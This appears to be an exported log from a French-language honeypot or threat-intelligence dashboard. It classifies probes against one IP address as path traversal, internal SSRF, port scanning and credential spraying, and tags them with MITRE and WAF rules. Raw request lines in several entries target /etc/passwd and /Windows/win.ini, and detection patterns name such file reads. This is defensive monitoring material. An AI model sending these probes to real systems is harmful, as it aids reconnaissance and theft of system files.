Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8008 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8008 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7005 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7005 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7005
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7005 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7005 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7005
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleW
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: 62.3.50.33:7005 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3128 · HTTP | http | SSRF interne ssrf internal · via HTTP:3128 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 2087 · HTTP | http | SSRF interne ssrf internal · via HTTP:2087 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
2087
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2087 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9002 · HTTP | http | SSRF interne ssrf internal · via HTTP:9002 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9002
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7003 · HTTP | http | SSRF interne ssrf internal · via HTTP:7003 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7003
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8009 · HTTP | http | Scan de ports port scan syn · via HTTP:8009 · (reconnaissance) | Élevée | Moyen · 54 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8040 · HTTP | http | SSRF interne ssrf internal · via HTTP:8040 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8040
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8040 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 9000 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:9000 · (sonde / probe) · → /login | Élevée | Élevé · 69 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9000
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Cont |
|||||||